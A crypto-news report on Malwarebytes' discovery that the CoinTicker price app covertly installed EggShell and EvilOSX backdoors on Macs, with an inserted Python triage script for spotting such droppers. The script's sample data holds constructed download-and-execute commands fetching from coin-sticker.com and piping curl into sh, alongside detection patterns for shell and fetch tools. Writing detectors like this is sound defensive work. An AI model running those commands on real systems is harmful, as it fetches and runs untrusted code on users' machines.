Malwarebytes, a platform that protects users against malware, malicious websites, and other advanced online threats, reported that 1vladimir, a contributor to the Malwarebytes forum, noticed that the CoinTicker iOS app, which was used to monitor cryptocurrency prices, was covertly installing two different backdoors onto users' computers.
The report further stated that the app did not display any type of harmful activity, so a user could keep using it without realizing that they were exposed to being hacked. After installation, the CoinTicker app lets its users select the cryptocurrencies whose prices are to be monitored; some of the major ones include Bitcoin [BTC], Ethereum [ETH], and Monero [XMR].
A small widget is also added to the macOS menu bar that updates the prices as they fluctuate. Once the application is installed on the computer, CoinTicker downloads EvilOSX and EggShell, which are open-source backdoors.
After installation, a custom-compiled version of the EggShell server is downloaded onto the Mac with the help of shell commands. Although the goal of the hacker behind this malware is still unclear, both EggShell and EvilOSX are backdoors that could be used to gain access to users' cryptocurrency wallets in order to steal cryptocurrency.
The report stated that this could have been a supply chain attack, in which the developer and the application itself are legitimate but the website is hacked by a third party to spread a malicious version of the app.
Further investigation, however, revealed that the app was never legitimate in the first place: the application's domain name is “coin-sticker.com”, which does not match the name of the application. According to the report, a wrong domain name would be “awfully sloppy” for a legitimate app.
In addition, the domain name had been registered only a couple of months earlier, which raised further suspicion. The report also noted that the malware did not require any root permissions, whereas there is usually an inaccurate emphasis on malware's need for root privileges. On the contrary, this malware is an example that they do not need root privileges to have a high potential for danger.
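The behaviour described above (a menu-bar app that pulls its backdoors down with shell commands, from a domain that does not match the app's name, without ever needing root) suggests a simple host-side triage rule. The Python below is an added example, not code from Malwarebytes, the forum report or the CoinTicker app; the process-event format is assumed, and the events and command lines in it are constructed for illustration rather than the app's real ones.

```python
import re

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}   # users legitimately run shells from these
# A fetch step followed by an execute step is the footprint of a dropper; the uid is
# recorded but deliberately never required to be 0 (this one ran as a normal user).
DOWNLOADER = re.compile(r"\b(curl|wget)\b|python\S*\s+-c")
EXECUTES_PAYLOAD = re.compile(r"\|\s*(ba|z)?sh\b|&&\s*(ba|z)?sh\b|chmod\s+\+x|&&\s*python")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed process events in a hypothetical telemetry shape (not real CoinTicker command lines).
SAMPLE_EVENTS = [
    {"parent": "CoinTicker", "uid": 501, "exe": "/bin/sh",
     "args": "sh -c curl -s http://coin-sticker.com/x -o /tmp/egg && sh /tmp/egg"},
    {"parent": "CoinTicker", "uid": 501, "exe": "/usr/bin/curl",
     "args": "curl https://api.coinmarketcap.com/v1/ticker/"},
    {"parent": "Terminal", "uid": 501, "exe": "/bin/sh",
     "args": "sh -c curl -s https://example.org/script.sh | sh"},
    {"parent": "CoinTicker", "uid": 501, "exe": "/bin/sh", "args": "sh -c ls /Applications"},
]

def hosts_not_matching_app(app_name, args):
    """URL hosts in args whose second-level label does not contain the app name
    (case and hyphens ignored, so coin-sticker.com still mismatches CoinTicker)."""
    app = re.sub(r"[^a-z0-9]", "", app_name.lower())
    mismatched = []
    for host in URL_HOST.findall(args):
        labels = host.lower().split(".")
        sld = labels[-2] if len(labels) >= 2 else labels[0]
        if app not in sld.replace("-", ""):
            mismatched.append(host)
    return mismatched

def triage(event):
    """Return the findings for one event (empty list when nothing looks suspicious)."""
    findings = []
    if event["parent"] not in INTERACTIVE_PARENTS and event["exe"] in SHELLS:
        findings.append("gui-app-spawned-shell")
        args = event["args"]
        if DOWNLOADER.search(args) and EXECUTES_PAYLOAD.search(args):
            findings.append("download-and-execute")
            findings += [f"domain-mismatch:{h}" for h in hosts_not_matching_app(event["parent"], args)]
    return findings

def scan(events):
    """Event index -> findings, for every event that produced at least one finding."""
    flagged = ((i, triage(e)) for i, e in enumerate(events))
    return {i: f for i, f in flagged if f}
```

Running `scan(SAMPLE_EVENTS)` flags only the two shells spawned by the menu-bar app; the interactive Terminal session and the app's direct price fetch are left alone.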
The post Bitcoin [BTC], Ethereum [ETH] and Monero [XMR] could be at risk due to new malware on macOS appeared first on AMBCrypto.